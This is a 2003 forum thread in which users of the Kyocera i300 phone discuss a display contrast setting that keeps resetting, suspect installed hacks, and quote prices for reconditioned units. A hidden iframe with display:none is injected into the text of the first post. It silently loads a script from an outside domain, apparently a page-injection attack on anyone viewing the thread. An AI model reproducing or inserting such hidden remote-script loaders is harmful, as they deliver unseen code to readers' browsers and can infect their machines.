+ Reply to Thread

contrast.....anybody have this problem?

My display seems a little whiter than normal recently. When I darken it using the contrast bar, it won't stay where I set it. When I check it a little while later, it's back in the middle. Anybody have this problem? And if my display is getting whiter, what may be happening?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

sprint pcs beta tester macmetal666's Avatar
    you will need to do a hard reset...something in one of the hacks or a program you are running is not for that phone...it is causing the lcd to burn and you are going though minor program resets to correct it......eventually the display will burn itself out, if you dont find the affected hack/programs.
    my i500 is more obsolete than your ti-99 or apple IIe

the only hacks I have running are:
    i300 alarm extension
    i300 graffiti hack
    i300 skin extension
    i300 vibrablinkhack
    keyboard

out of the 25 or so i300's i currently have, about 15 of them have a problem with the contrast screen having to be up all the way(or close to)

i know that the contrast has been a problem with the i3 from the start. they are simular to fingerprints no two are alike.

i am unfamilar with the vibrablink hack(send me a url please) but i do know that some skin hacks are designed with the v4.1 or better screens and are being used on m130's i300's m505's and etc that arent hi rez displays, thus causing problems with the contrast. try removing the hack and see if this doesnt help....if it doesnt, then you are just playing the waiting game until the display finally goes white.
    sorry and good luck.(btw if it goes i have several good recons that i can sell at a fair price)

How much for one of your reconditioned i300s? Mine has a lot of scratches on the case, but the screen isn't.

Better yet...

How much for a reconditioned i330 ?

LOL

i300's for a recon or tech tester are around $125 for the whole box(2 batt/stylus/case/cd/cradle) I have 2 right now for sale.

an i330 is A LOTMORE just the unit is around $350-375 add the box contents and it comes to 425-450. not a good deal considering they sell new for $499 (and sometimes for even 399)
    Last edited by macmetal666; 08-08-2003 at 11:53 PM.